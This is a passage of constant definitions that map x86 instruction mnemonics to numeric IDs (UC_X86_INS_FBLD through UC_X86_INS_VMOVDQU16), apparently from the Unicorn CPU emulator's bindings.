UC_X86_INS_FBLD = 160 UC_X86_INS_FBSTP = 161 UC_X86_INS_FCOMPP = 162 UC_X86_INS_FDECSTP = 163 UC_X86_INS_FEMMS = 164 UC_X86_INS_FFREE = 165 UC_X86_INS_FICOM = 166 UC_X86_INS_FICOMP = 167 UC_X86_INS_FINCSTP = 168 UC_X86_INS_FLDCW = 169 UC_X86_INS_FLDENV = 170 UC_X86_INS_FLDL2E = 171 UC_X86_INS_FLDL2T = 172 UC_X86_INS_FLDLG2 = 173 UC_X86_INS_FLDLN2 = 174 UC_X86_INS_FLDPI = 175 UC_X86_INS_FNCLEX = 176 UC_X86_INS_FNINIT = 177 UC_X86_INS_FNOP = 178 UC_X86_INS_FNSTCW = 179 UC_X86_INS_FNSTSW = 180 UC_X86_INS_FPATAN = 181 UC_X86_INS_FPREM = 182 UC_X86_INS_FPREM1 = 183 UC_X86_INS_FPTAN = 184 UC_X86_INS_FFREEP = 185 UC_X86_INS_FRNDINT = 186 UC_X86_INS_FRSTOR = 187 UC_X86_INS_FNSAVE = 188 UC_X86_INS_FSCALE = 189 UC_X86_INS_FSETPM = 190 UC_X86_INS_FSINCOS = 191 UC_X86_INS_FNSTENV = 192 
UC_X86_INS_FXAM = 193 UC_X86_INS_FXRSTOR = 194 UC_X86_INS_FXRSTOR64 = 195 UC_X86_INS_FXSAVE = 196 UC_X86_INS_FXSAVE64 = 197 UC_X86_INS_FXTRACT = 198 UC_X86_INS_FYL2X = 199 UC_X86_INS_FYL2XP1 = 200 UC_X86_INS_MOVAPD = 201 UC_X86_INS_MOVAPS = 202 UC_X86_INS_ORPD = 203 UC_X86_INS_ORPS = 204 UC_X86_INS_VMOVAPD = 205 UC_X86_INS_VMOVAPS = 206 UC_X86_INS_XORPD = 207 UC_X86_INS_XORPS = 208 UC_X86_INS_GETSEC = 209 UC_X86_INS_HADDPD = 210 UC_X86_INS_HADDPS = 211 UC_X86_INS_HLT = 212 UC_X86_INS_HSUBPD = 213 UC_X86_INS_HSUBPS = 214 UC_X86_INS_IDIV = 215 UC_X86_INS_FILD = 216 UC_X86_INS_IMUL = 217 UC_X86_INS_IN = 218 UC_X86_INS_INC = 219 UC_X86_INS_INSB = 220 UC_X86_INS_INSERTPS = 221 UC_X86_INS_INSERTQ = 222 UC_X86_INS_INSD = 223 UC_X86_INS_INSW = 224 UC_X86_INS_INT = 225 UC_X86_INS_INT1 = 226 UC_X86_INS_INT3 = 227 UC_X86_INS_INTO = 228 UC_X86_INS_INVD = 229 UC_X86_INS_INVEPT = 230 UC_X86_INS_INVLPG = 231 UC_X86_INS_INVLPGA = 232 UC_X86_INS_INVPCID = 233 UC_X86_INS_INVVPID = 234 UC_X86_INS_IRET = 235 UC_X86_INS_IRETD = 236 UC_X86_INS_IRETQ = 237 UC_X86_INS_FISTTP = 238 UC_X86_INS_FIST = 239 UC_X86_INS_FISTP = 240 UC_X86_INS_UCOMISD = 241 UC_X86_INS_UCOMISS = 242 UC_X86_INS_VCOMISD = 243 UC_X86_INS_VCOMISS = 244 UC_X86_INS_VCVTSD2SS = 245 UC_X86_INS_VCVTSI2SD = 246 UC_X86_INS_VCVTSI2SS = 247 UC_X86_INS_VCVTSS2SD = 248 UC_X86_INS_VCVTTSD2SI = 249 UC_X86_INS_VCVTTSD2USI = 250 UC_X86_INS_VCVTTSS2SI = 251 UC_X86_INS_VCVTTSS2USI = 252 UC_X86_INS_VCVTUSI2SD = 253 UC_X86_INS_VCVTUSI2SS = 254 UC_X86_INS_VUCOMISD = 255 UC_X86_INS_VUCOMISS = 256 UC_X86_INS_JAE = 257 UC_X86_INS_JA = 258 UC_X86_INS_JBE = 259 UC_X86_INS_JB = 260 UC_X86_INS_JCXZ = 261 UC_X86_INS_JECXZ = 262 UC_X86_INS_JE = 263 UC_X86_INS_JGE = 264 UC_X86_INS_JG = 265 UC_X86_INS_JLE = 266 UC_X86_INS_JL = 267 UC_X86_INS_JMP = 268 UC_X86_INS_JNE = 269 UC_X86_INS_JNO = 270 UC_X86_INS_JNP = 271 UC_X86_INS_JNS = 272 UC_X86_INS_JO = 273 UC_X86_INS_JP = 274 UC_X86_INS_JRCXZ = 275 UC_X86_INS_JS = 276 UC_X86_INS_KANDB = 277 UC_X86_INS_KANDD = 278 UC_X86_INS_KANDNB = 279 UC_X86_INS_KANDND = 280 UC_X86_INS_KANDNQ = 281 UC_X86_INS_KANDNW = 282 UC_X86_INS_KANDQ = 283 UC_X86_INS_KANDW = 284 UC_X86_INS_KMOVB = 285 UC_X86_INS_KMOVD = 286 UC_X86_INS_KMOVQ = 287 UC_X86_INS_KMOVW = 288 UC_X86_INS_KNOTB = 289 UC_X86_INS_KNOTD = 290 UC_X86_INS_KNOTQ = 291 UC_X86_INS_KNOTW = 292 UC_X86_INS_KORB = 293 UC_X86_INS_KORD = 294 UC_X86_INS_KORQ = 295 UC_X86_INS_KORTESTB = 296 UC_X86_INS_KORTESTD = 297 UC_X86_INS_KORTESTQ = 298 UC_X86_INS_KORTESTW = 299 UC_X86_INS_KORW = 300 UC_X86_INS_KSHIFTLB = 301 UC_X86_INS_KSHIFTLD = 302 UC_X86_INS_KSHIFTLQ = 303 UC_X86_INS_KSHIFTLW = 304 UC_X86_INS_KSHIFTRB = 305 UC_X86_INS_KSHIFTRD = 306 UC_X86_INS_KSHIFTRQ = 307 UC_X86_INS_KSHIFTRW = 308 UC_X86_INS_KUNPCKBW = 309 UC_X86_INS_KXNORB = 310 UC_X86_INS_KXNORD = 311 UC_X86_INS_KXNORQ = 312 UC_X86_INS_KXNORW = 313 UC_X86_INS_KXORB = 314 UC_X86_INS_KXORD = 315 UC_X86_INS_KXORQ = 316 UC_X86_INS_KXORW = 317 UC_X86_INS_LAHF = 318 UC_X86_INS_LAR = 319 UC_X86_INS_LDDQU = 320 UC_X86_INS_LDMXCSR = 321 UC_X86_INS_LDS = 322 UC_X86_INS_FLDZ = 323 UC_X86_INS_FLD1 = 324 UC_X86_INS_FLD = 325 UC_X86_INS_LEA = 326 UC_X86_INS_LEAVE = 327 UC_X86_INS_LES = 328 UC_X86_INS_LFENCE = 329 UC_X86_INS_LFS = 330 UC_X86_INS_LGDT = 331 UC_X86_INS_LGS = 332 UC_X86_INS_LIDT = 333 UC_X86_INS_LLDT = 334 UC_X86_INS_LMSW = 335 UC_X86_INS_OR = 336 UC_X86_INS_SUB = 337 UC_X86_INS_XOR = 338 UC_X86_INS_LODSB = 339 UC_X86_INS_LODSD = 340 UC_X86_INS_LODSQ = 341 UC_X86_INS_LODSW = 342 UC_X86_INS_LOOP = 343 UC_X86_INS_LOOPE = 344 
UC_X86_INS_LOOPNE = 345 UC_X86_INS_RETF = 346 UC_X86_INS_RETFQ = 347 UC_X86_INS_LSL = 348 UC_X86_INS_LSS = 349 UC_X86_INS_LTR = 350 UC_X86_INS_XADD = 351 UC_X86_INS_LZCNT = 352 UC_X86_INS_MASKMOVDQU = 353 UC_X86_INS_MAXPD = 354 UC_X86_INS_MAXPS = 355 UC_X86_INS_MAXSD = 356 UC_X86_INS_MAXSS = 357 UC_X86_INS_MFENCE = 358 UC_X86_INS_MINPD = 359 UC_X86_INS_MINPS = 360 UC_X86_INS_MINSD = 361 UC_X86_INS_MINSS = 362 UC_X86_INS_CVTPD2PI = 363 UC_X86_INS_CVTPI2PD = 364 UC_X86_INS_CVTPI2PS = 365 UC_X86_INS_CVTPS2PI = 366 UC_X86_INS_CVTTPD2PI = 367 UC_X86_INS_CVTTPS2PI = 368 UC_X86_INS_EMMS = 369 UC_X86_INS_MASKMOVQ = 370 UC_X86_INS_MOVD = 371 UC_X86_INS_MOVDQ2Q = 372 UC_X86_INS_MOVNTQ = 373 UC_X86_INS_MOVQ2DQ = 374 UC_X86_INS_MOVQ = 375 UC_X86_INS_PABSB = 376 UC_X86_INS_PABSD = 377 UC_X86_INS_PABSW = 378 UC_X86_INS_PACKSSDW = 379 UC_X86_INS_PACKSSWB = 380 UC_X86_INS_PACKUSWB = 381 UC_X86_INS_PADDB = 382 UC_X86_INS_PADDD = 383 UC_X86_INS_PADDQ = 384 UC_X86_INS_PADDSB = 385 UC_X86_INS_PADDSW = 386 UC_X86_INS_PADDUSB = 387 UC_X86_INS_PADDUSW = 388 UC_X86_INS_PADDW = 389 UC_X86_INS_PALIGNR = 390 UC_X86_INS_PANDN = 391 UC_X86_INS_PAND = 392 UC_X86_INS_PAVGB = 393 UC_X86_INS_PAVGW = 394 UC_X86_INS_PCMPEQB = 395 UC_X86_INS_PCMPEQD = 396 UC_X86_INS_PCMPEQW = 397 UC_X86_INS_PCMPGTB = 398 UC_X86_INS_PCMPGTD = 399 UC_X86_INS_PCMPGTW = 400 UC_X86_INS_PEXTRW = 401 UC_X86_INS_PHADDSW = 402 UC_X86_INS_PHADDW = 403 UC_X86_INS_PHADDD = 404 UC_X86_INS_PHSUBD = 405 UC_X86_INS_PHSUBSW = 406 UC_X86_INS_PHSUBW = 407 UC_X86_INS_PINSRW = 408 UC_X86_INS_PMADDUBSW = 409 UC_X86_INS_PMADDWD = 410 UC_X86_INS_PMAXSW = 411 UC_X86_INS_PMAXUB = 412 UC_X86_INS_PMINSW = 413 UC_X86_INS_PMINUB = 414 UC_X86_INS_PMOVMSKB = 415 UC_X86_INS_PMULHRSW = 416 UC_X86_INS_PMULHUW = 417 UC_X86_INS_PMULHW = 418 UC_X86_INS_PMULLW = 419 UC_X86_INS_PMULUDQ = 420 UC_X86_INS_POR = 421 UC_X86_INS_PSADBW = 422 UC_X86_INS_PSHUFB = 423 UC_X86_INS_PSHUFW = 424 UC_X86_INS_PSIGNB = 425 UC_X86_INS_PSIGND = 426 UC_X86_INS_PSIGNW = 427 UC_X86_INS_PSLLD = 428 UC_X86_INS_PSLLQ = 429 UC_X86_INS_PSLLW = 430 UC_X86_INS_PSRAD = 431 UC_X86_INS_PSRAW = 432 UC_X86_INS_PSRLD = 433 UC_X86_INS_PSRLQ = 434 UC_X86_INS_PSRLW = 435 UC_X86_INS_PSUBB = 436 UC_X86_INS_PSUBD = 437 UC_X86_INS_PSUBQ = 438 UC_X86_INS_PSUBSB = 439 UC_X86_INS_PSUBSW = 440 UC_X86_INS_PSUBUSB = 441 UC_X86_INS_PSUBUSW = 442 UC_X86_INS_PSUBW = 443 UC_X86_INS_PUNPCKHBW = 444 UC_X86_INS_PUNPCKHDQ = 445 UC_X86_INS_PUNPCKHWD = 446 UC_X86_INS_PUNPCKLBW = 447 UC_X86_INS_PUNPCKLDQ = 448 UC_X86_INS_PUNPCKLWD = 449 UC_X86_INS_PXOR = 450 UC_X86_INS_MONITOR = 451 UC_X86_INS_MONTMUL = 452 UC_X86_INS_MOV = 453 UC_X86_INS_MOVABS = 454 UC_X86_INS_MOVBE = 455 UC_X86_INS_MOVDDUP = 456 UC_X86_INS_MOVDQA = 457 UC_X86_INS_MOVDQU = 458 UC_X86_INS_MOVHLPS = 459 UC_X86_INS_MOVHPD = 460 UC_X86_INS_MOVHPS = 461 UC_X86_INS_MOVLHPS = 462 UC_X86_INS_MOVLPD = 463 UC_X86_INS_MOVLPS = 464 UC_X86_INS_MOVMSKPD = 465 UC_X86_INS_MOVMSKPS = 466 UC_X86_INS_MOVNTDQA = 467 UC_X86_INS_MOVNTDQ = 468 UC_X86_INS_MOVNTI = 469 UC_X86_INS_MOVNTPD = 470 UC_X86_INS_MOVNTPS = 471 UC_X86_INS_MOVNTSD = 472 UC_X86_INS_MOVNTSS = 473 UC_X86_INS_MOVSB = 474 UC_X86_INS_MOVSD = 475 UC_X86_INS_MOVSHDUP = 476 UC_X86_INS_MOVSLDUP = 477 UC_X86_INS_MOVSQ = 478 UC_X86_INS_MOVSS = 479 UC_X86_INS_MOVSW = 480 UC_X86_INS_MOVSX = 481 UC_X86_INS_MOVSXD = 482 UC_X86_INS_MOVUPD = 483 UC_X86_INS_MOVUPS = 484 UC_X86_INS_MOVZX = 485 UC_X86_INS_MPSADBW = 486 UC_X86_INS_MUL = 487 UC_X86_INS_MULPD = 488 UC_X86_INS_MULPS = 489 UC_X86_INS_MULSD = 490 UC_X86_INS_MULSS = 491 
UC_X86_INS_MULX = 492 UC_X86_INS_FMUL = 493 UC_X86_INS_FIMUL = 494 UC_X86_INS_FMULP = 495 UC_X86_INS_MWAIT = 496 UC_X86_INS_NEG = 497 UC_X86_INS_NOP = 498 UC_X86_INS_NOT = 499 UC_X86_INS_OUT = 500 UC_X86_INS_OUTSB = 501 UC_X86_INS_OUTSD = 502 UC_X86_INS_OUTSW = 503 UC_X86_INS_PACKUSDW = 504 UC_X86_INS_PAUSE = 505 UC_X86_INS_PAVGUSB = 506 UC_X86_INS_PBLENDVB = 507 UC_X86_INS_PBLENDW = 508 UC_X86_INS_PCLMULQDQ = 509 UC_X86_INS_PCMPEQQ = 510 UC_X86_INS_PCMPESTRI = 511 UC_X86_INS_PCMPESTRM = 512 UC_X86_INS_PCMPGTQ = 513 UC_X86_INS_PCMPISTRI = 514 UC_X86_INS_PCMPISTRM = 515 UC_X86_INS_PCOMMIT = 516 UC_X86_INS_PDEP = 517 UC_X86_INS_PEXT = 518 UC_X86_INS_PEXTRB = 519 UC_X86_INS_PEXTRD = 520 UC_X86_INS_PEXTRQ = 521 UC_X86_INS_PF2ID = 522 UC_X86_INS_PF2IW = 523 UC_X86_INS_PFACC = 524 UC_X86_INS_PFADD = 525 UC_X86_INS_PFCMPEQ = 526 UC_X86_INS_PFCMPGE = 527 UC_X86_INS_PFCMPGT = 528 UC_X86_INS_PFMAX = 529 UC_X86_INS_PFMIN = 530 UC_X86_INS_PFMUL = 531 UC_X86_INS_PFNACC = 532 UC_X86_INS_PFPNACC = 533 UC_X86_INS_PFRCPIT1 = 534 UC_X86_INS_PFRCPIT2 = 535 UC_X86_INS_PFRCP = 536 UC_X86_INS_PFRSQIT1 = 537 UC_X86_INS_PFRSQRT = 538 UC_X86_INS_PFSUBR = 539 UC_X86_INS_PFSUB = 540 UC_X86_INS_PHMINPOSUW = 541 UC_X86_INS_PI2FD = 542 UC_X86_INS_PI2FW = 543 UC_X86_INS_PINSRB = 544 UC_X86_INS_PINSRD = 545 UC_X86_INS_PINSRQ = 546 UC_X86_INS_PMAXSB = 547 UC_X86_INS_PMAXSD = 548 UC_X86_INS_PMAXUD = 549 UC_X86_INS_PMAXUW = 550 UC_X86_INS_PMINSB = 551 UC_X86_INS_PMINSD = 552 UC_X86_INS_PMINUD = 553 UC_X86_INS_PMINUW = 554 UC_X86_INS_PMOVSXBD = 555 UC_X86_INS_PMOVSXBQ = 556 UC_X86_INS_PMOVSXBW = 557 UC_X86_INS_PMOVSXDQ = 558 UC_X86_INS_PMOVSXWD = 559 UC_X86_INS_PMOVSXWQ = 560 UC_X86_INS_PMOVZXBD = 561 UC_X86_INS_PMOVZXBQ = 562 UC_X86_INS_PMOVZXBW = 563 UC_X86_INS_PMOVZXDQ = 564 UC_X86_INS_PMOVZXWD = 565 UC_X86_INS_PMOVZXWQ = 566 UC_X86_INS_PMULDQ = 567 UC_X86_INS_PMULHRW = 568 UC_X86_INS_PMULLD = 569 UC_X86_INS_POP = 570 UC_X86_INS_POPAW = 571 UC_X86_INS_POPAL = 572 UC_X86_INS_POPCNT = 573 UC_X86_INS_POPF = 574 UC_X86_INS_POPFD = 575 UC_X86_INS_POPFQ = 576 UC_X86_INS_PREFETCH = 577 UC_X86_INS_PREFETCHNTA = 578 UC_X86_INS_PREFETCHT0 = 579 UC_X86_INS_PREFETCHT1 = 580 UC_X86_INS_PREFETCHT2 = 581 UC_X86_INS_PREFETCHW = 582 UC_X86_INS_PSHUFD = 583 UC_X86_INS_PSHUFHW = 584 UC_X86_INS_PSHUFLW = 585 UC_X86_INS_PSLLDQ = 586 UC_X86_INS_PSRLDQ = 587 UC_X86_INS_PSWAPD = 588 UC_X86_INS_PTEST = 589 UC_X86_INS_PUNPCKHQDQ = 590 UC_X86_INS_PUNPCKLQDQ = 591 UC_X86_INS_PUSH = 592 UC_X86_INS_PUSHAW = 593 UC_X86_INS_PUSHAL = 594 UC_X86_INS_PUSHF = 595 UC_X86_INS_PUSHFD = 596 UC_X86_INS_PUSHFQ = 597 UC_X86_INS_RCL = 598 UC_X86_INS_RCPPS = 599 UC_X86_INS_RCPSS = 600 UC_X86_INS_RCR = 601 UC_X86_INS_RDFSBASE = 602 UC_X86_INS_RDGSBASE = 603 UC_X86_INS_RDMSR = 604 UC_X86_INS_RDPMC = 605 UC_X86_INS_RDRAND = 606 UC_X86_INS_RDSEED = 607 UC_X86_INS_RDTSC = 608 UC_X86_INS_RDTSCP = 609 UC_X86_INS_ROL = 610 UC_X86_INS_ROR = 611 UC_X86_INS_RORX = 612 UC_X86_INS_ROUNDPD = 613 UC_X86_INS_ROUNDPS = 614 UC_X86_INS_ROUNDSD = 615 UC_X86_INS_ROUNDSS = 616 UC_X86_INS_RSM = 617 UC_X86_INS_RSQRTPS = 618 UC_X86_INS_RSQRTSS = 619 UC_X86_INS_SAHF = 620 UC_X86_INS_SAL = 621 UC_X86_INS_SALC = 622 UC_X86_INS_SAR = 623 UC_X86_INS_SARX = 624 UC_X86_INS_SBB = 625 UC_X86_INS_SCASB = 626 UC_X86_INS_SCASD = 627 UC_X86_INS_SCASQ = 628 UC_X86_INS_SCASW = 629 UC_X86_INS_SETAE = 630 UC_X86_INS_SETA = 631 UC_X86_INS_SETBE = 632 UC_X86_INS_SETB = 633 UC_X86_INS_SETE = 634 UC_X86_INS_SETGE = 635 UC_X86_INS_SETG = 636 UC_X86_INS_SETLE = 637 UC_X86_INS_SETL = 638 UC_X86_INS_SETNE = 639 
UC_X86_INS_SETNO = 640 UC_X86_INS_SETNP = 641 UC_X86_INS_SETNS = 642 UC_X86_INS_SETO = 643 UC_X86_INS_SETP = 644 UC_X86_INS_SETS = 645 UC_X86_INS_SFENCE = 646 UC_X86_INS_SGDT = 647 UC_X86_INS_SHA1MSG1 = 648 UC_X86_INS_SHA1MSG2 = 649 UC_X86_INS_SHA1NEXTE = 650 UC_X86_INS_SHA1RNDS4 = 651 UC_X86_INS_SHA256MSG1 = 652 UC_X86_INS_SHA256MSG2 = 653 UC_X86_INS_SHA256RNDS2 = 654 UC_X86_INS_SHL = 655 UC_X86_INS_SHLD = 656 UC_X86_INS_SHLX = 657 UC_X86_INS_SHR = 658 UC_X86_INS_SHRD = 659 UC_X86_INS_SHRX = 660 UC_X86_INS_SHUFPD = 661 UC_X86_INS_SHUFPS = 662 UC_X86_INS_SIDT = 663 UC_X86_INS_FSIN = 664 UC_X86_INS_SKINIT = 665 UC_X86_INS_SLDT = 666 UC_X86_INS_SMSW = 667 UC_X86_INS_SQRTPD = 668 UC_X86_INS_SQRTPS = 669 UC_X86_INS_SQRTSD = 670 UC_X86_INS_SQRTSS = 671 UC_X86_INS_FSQRT = 672 UC_X86_INS_STAC = 673 UC_X86_INS_STC = 674 UC_X86_INS_STD = 675 UC_X86_INS_STGI = 676 UC_X86_INS_STI = 677 UC_X86_INS_STMXCSR = 678 UC_X86_INS_STOSB = 679 UC_X86_INS_STOSD = 680 UC_X86_INS_STOSQ = 681 UC_X86_INS_STOSW = 682 UC_X86_INS_STR = 683 UC_X86_INS_FST = 684 UC_X86_INS_FSTP = 685 UC_X86_INS_FSTPNCE = 686 UC_X86_INS_FXCH = 687 UC_X86_INS_SUBPD = 688 UC_X86_INS_SUBPS = 689 UC_X86_INS_FSUBR = 690 UC_X86_INS_FISUBR = 691 UC_X86_INS_FSUBRP = 692 UC_X86_INS_SUBSD = 693 UC_X86_INS_SUBSS = 694 UC_X86_INS_FSUB = 695 UC_X86_INS_FISUB = 696 UC_X86_INS_FSUBP = 697 UC_X86_INS_SWAPGS = 698 UC_X86_INS_SYSCALL = 699 UC_X86_INS_SYSENTER = 700 UC_X86_INS_SYSEXIT = 701 UC_X86_INS_SYSRET = 702 UC_X86_INS_T1MSKC = 703 UC_X86_INS_TEST = 704 UC_X86_INS_UD2 = 705 UC_X86_INS_FTST = 706 UC_X86_INS_TZCNT = 707 UC_X86_INS_TZMSK = 708 UC_X86_INS_FUCOMPI = 709 UC_X86_INS_FUCOMI = 710 UC_X86_INS_FUCOMPP = 711 UC_X86_INS_FUCOMP = 712 UC_X86_INS_FUCOM = 713 UC_X86_INS_UD2B = 714 UC_X86_INS_UNPCKHPD = 715 UC_X86_INS_UNPCKHPS = 716 UC_X86_INS_UNPCKLPD = 717 UC_X86_INS_UNPCKLPS = 718 UC_X86_INS_VADDPD = 719 UC_X86_INS_VADDPS = 720 UC_X86_INS_VADDSD = 721 UC_X86_INS_VADDSS = 722 UC_X86_INS_VADDSUBPD = 723 UC_X86_INS_VADDSUBPS = 724 UC_X86_INS_VAESDECLAST = 725 UC_X86_INS_VAESDEC = 726 UC_X86_INS_VAESENCLAST = 727 UC_X86_INS_VAESENC = 728 UC_X86_INS_VAESIMC = 729 UC_X86_INS_VAESKEYGENASSIST = 730 UC_X86_INS_VALIGND = 731 UC_X86_INS_VALIGNQ = 732 UC_X86_INS_VANDNPD = 733 UC_X86_INS_VANDNPS = 734 UC_X86_INS_VANDPD = 735 UC_X86_INS_VANDPS = 736 UC_X86_INS_VBLENDMPD = 737 UC_X86_INS_VBLENDMPS = 738 UC_X86_INS_VBLENDPD = 739 UC_X86_INS_VBLENDPS = 740 UC_X86_INS_VBLENDVPD = 741 UC_X86_INS_VBLENDVPS = 742 UC_X86_INS_VBROADCASTF128 = 743 UC_X86_INS_VBROADCASTI32X4 = 744 UC_X86_INS_VBROADCASTI64X4 = 745 UC_X86_INS_VBROADCASTSD = 746 UC_X86_INS_VBROADCASTSS = 747 UC_X86_INS_VCMPPD = 748 UC_X86_INS_VCMPPS = 749 UC_X86_INS_VCMPSD = 750 UC_X86_INS_VCMPSS = 751 UC_X86_INS_VCOMPRESSPD = 752 UC_X86_INS_VCOMPRESSPS = 753 UC_X86_INS_VCVTDQ2PD = 754 UC_X86_INS_VCVTDQ2PS = 755 UC_X86_INS_VCVTPD2DQX = 756 UC_X86_INS_VCVTPD2DQ = 757 UC_X86_INS_VCVTPD2PSX = 758 UC_X86_INS_VCVTPD2PS = 759 UC_X86_INS_VCVTPD2UDQ = 760 UC_X86_INS_VCVTPH2PS = 761 UC_X86_INS_VCVTPS2DQ = 762 UC_X86_INS_VCVTPS2PD = 763 UC_X86_INS_VCVTPS2PH = 764 UC_X86_INS_VCVTPS2UDQ = 765 UC_X86_INS_VCVTSD2SI = 766 UC_X86_INS_VCVTSD2USI = 767 UC_X86_INS_VCVTSS2SI = 768 UC_X86_INS_VCVTSS2USI = 769 UC_X86_INS_VCVTTPD2DQX = 770 UC_X86_INS_VCVTTPD2DQ = 771 UC_X86_INS_VCVTTPD2UDQ = 772 UC_X86_INS_VCVTTPS2DQ = 773 UC_X86_INS_VCVTTPS2UDQ = 774 UC_X86_INS_VCVTUDQ2PD = 775 UC_X86_INS_VCVTUDQ2PS = 776 UC_X86_INS_VDIVPD = 777 UC_X86_INS_VDIVPS = 778 UC_X86_INS_VDIVSD = 779 UC_X86_INS_VDIVSS = 780 UC_X86_INS_VDPPD = 781 
UC_X86_INS_VDPPS = 782 UC_X86_INS_VERR = 783 UC_X86_INS_VERW = 784 UC_X86_INS_VEXP2PD = 785 UC_X86_INS_VEXP2PS = 786 UC_X86_INS_VEXPANDPD = 787 UC_X86_INS_VEXPANDPS = 788 UC_X86_INS_VEXTRACTF128 = 789 UC_X86_INS_VEXTRACTF32X4 = 790 UC_X86_INS_VEXTRACTF64X4 = 791 UC_X86_INS_VEXTRACTI128 = 792 UC_X86_INS_VEXTRACTI32X4 = 793 UC_X86_INS_VEXTRACTI64X4 = 794 UC_X86_INS_VEXTRACTPS = 795 UC_X86_INS_VFMADD132PD = 796 UC_X86_INS_VFMADD132PS = 797 UC_X86_INS_VFMADDPD = 798 UC_X86_INS_VFMADD213PD = 799 UC_X86_INS_VFMADD231PD = 800 UC_X86_INS_VFMADDPS = 801 UC_X86_INS_VFMADD213PS = 802 UC_X86_INS_VFMADD231PS = 803 UC_X86_INS_VFMADDSD = 804 UC_X86_INS_VFMADD213SD = 805 UC_X86_INS_VFMADD132SD = 806 UC_X86_INS_VFMADD231SD = 807 UC_X86_INS_VFMADDSS = 808 UC_X86_INS_VFMADD213SS = 809 UC_X86_INS_VFMADD132SS = 810 UC_X86_INS_VFMADD231SS = 811 UC_X86_INS_VFMADDSUB132PD = 812 UC_X86_INS_VFMADDSUB132PS = 813 UC_X86_INS_VFMADDSUBPD = 814 UC_X86_INS_VFMADDSUB213PD = 815 UC_X86_INS_VFMADDSUB231PD = 816 UC_X86_INS_VFMADDSUBPS = 817 UC_X86_INS_VFMADDSUB213PS = 818 UC_X86_INS_VFMADDSUB231PS = 819 UC_X86_INS_VFMSUB132PD = 820 UC_X86_INS_VFMSUB132PS = 821 UC_X86_INS_VFMSUBADD132PD = 822 UC_X86_INS_VFMSUBADD132PS = 823 UC_X86_INS_VFMSUBADDPD = 824 UC_X86_INS_VFMSUBADD213PD = 825 UC_X86_INS_VFMSUBADD231PD = 826 UC_X86_INS_VFMSUBADDPS = 827 UC_X86_INS_VFMSUBADD213PS = 828 UC_X86_INS_VFMSUBADD231PS = 829 UC_X86_INS_VFMSUBPD = 830 UC_X86_INS_VFMSUB213PD = 831 UC_X86_INS_VFMSUB231PD = 832 UC_X86_INS_VFMSUBPS = 833 UC_X86_INS_VFMSUB213PS = 834 UC_X86_INS_VFMSUB231PS = 835 UC_X86_INS_VFMSUBSD = 836 UC_X86_INS_VFMSUB213SD = 837 UC_X86_INS_VFMSUB132SD = 838 UC_X86_INS_VFMSUB231SD = 839 UC_X86_INS_VFMSUBSS = 840 UC_X86_INS_VFMSUB213SS = 841 UC_X86_INS_VFMSUB132SS = 842 UC_X86_INS_VFMSUB231SS = 843 UC_X86_INS_VFNMADD132PD = 844 UC_X86_INS_VFNMADD132PS = 845 UC_X86_INS_VFNMADDPD = 846 UC_X86_INS_VFNMADD213PD = 847 UC_X86_INS_VFNMADD231PD = 848 UC_X86_INS_VFNMADDPS = 849 UC_X86_INS_VFNMADD213PS = 850 UC_X86_INS_VFNMADD231PS = 851 UC_X86_INS_VFNMADDSD = 852 UC_X86_INS_VFNMADD213SD = 853 UC_X86_INS_VFNMADD132SD = 854 UC_X86_INS_VFNMADD231SD = 855 UC_X86_INS_VFNMADDSS = 856 UC_X86_INS_VFNMADD213SS = 857 UC_X86_INS_VFNMADD132SS = 858 UC_X86_INS_VFNMADD231SS = 859 UC_X86_INS_VFNMSUB132PD = 860 UC_X86_INS_VFNMSUB132PS = 861 UC_X86_INS_VFNMSUBPD = 862 UC_X86_INS_VFNMSUB213PD = 863 UC_X86_INS_VFNMSUB231PD = 864 UC_X86_INS_VFNMSUBPS = 865 UC_X86_INS_VFNMSUB213PS = 866 UC_X86_INS_VFNMSUB231PS = 867 UC_X86_INS_VFNMSUBSD = 868 UC_X86_INS_VFNMSUB213SD = 869 UC_X86_INS_VFNMSUB132SD = 870 UC_X86_INS_VFNMSUB231SD = 871 UC_X86_INS_VFNMSUBSS = 872 UC_X86_INS_VFNMSUB213SS = 873 UC_X86_INS_VFNMSUB132SS = 874 UC_X86_INS_VFNMSUB231SS = 875 UC_X86_INS_VFRCZPD = 876 UC_X86_INS_VFRCZPS = 877 UC_X86_INS_VFRCZSD = 878 UC_X86_INS_VFRCZSS = 879 UC_X86_INS_VORPD = 880 UC_X86_INS_VORPS = 881 UC_X86_INS_VXORPD = 882 UC_X86_INS_VXORPS = 883 UC_X86_INS_VGATHERDPD = 884 UC_X86_INS_VGATHERDPS = 885 UC_X86_INS_VGATHERPF0DPD = 886 UC_X86_INS_VGATHERPF0DPS = 887 UC_X86_INS_VGATHERPF0QPD = 888 UC_X86_INS_VGATHERPF0QPS = 889 UC_X86_INS_VGATHERPF1DPD = 890 UC_X86_INS_VGATHERPF1DPS = 891 UC_X86_INS_VGATHERPF1QPD = 892 UC_X86_INS_VGATHERPF1QPS = 893 UC_X86_INS_VGATHERQPD = 894 UC_X86_INS_VGATHERQPS = 895 UC_X86_INS_VHADDPD = 896 UC_X86_INS_VHADDPS = 897 UC_X86_INS_VHSUBPD = 898 UC_X86_INS_VHSUBPS = 899 UC_X86_INS_VINSERTF128 = 900 UC_X86_INS_VINSERTF32X4 = 901 UC_X86_INS_VINSERTF32X8 = 902 UC_X86_INS_VINSERTF64X2 = 903 UC_X86_INS_VINSERTF64X4 = 904 UC_X86_INS_VINSERTI128 = 905 
UC_X86_INS_VINSERTI32X4 = 906 UC_X86_INS_VINSERTI32X8 = 907 UC_X86_INS_VINSERTI64X2 = 908 UC_X86_INS_VINSERTI64X4 = 909 UC_X86_INS_VINSERTPS = 910 UC_X86_INS_VLDDQU = 911 UC_X86_INS_VLDMXCSR = 912 UC_X86_INS_VMASKMOVDQU = 913 UC_X86_INS_VMASKMOVPD = 914 UC_X86_INS_VMASKMOVPS = 915 UC_X86_INS_VMAXPD = 916 UC_X86_INS_VMAXPS = 917 UC_X86_INS_VMAXSD = 918 UC_X86_INS_VMAXSS = 919 UC_X86_INS_VMCALL = 920 UC_X86_INS_VMCLEAR = 921 UC_X86_INS_VMFUNC = 922 UC_X86_INS_VMINPD = 923 UC_X86_INS_VMINPS = 924 UC_X86_INS_VMINSD = 925 UC_X86_INS_VMINSS = 926 UC_X86_INS_VMLAUNCH = 927 UC_X86_INS_VMLOAD = 928 UC_X86_INS_VMMCALL = 929 UC_X86_INS_VMOVQ = 930 UC_X86_INS_VMOVDDUP = 931 UC_X86_INS_VMOVD = 932 UC_X86_INS_VMOVDQA32 = 933 UC_X86_INS_VMOVDQA64 = 934 UC_X86_INS_VMOVDQA = 935 UC_X86_INS_VMOVDQU16 = 936 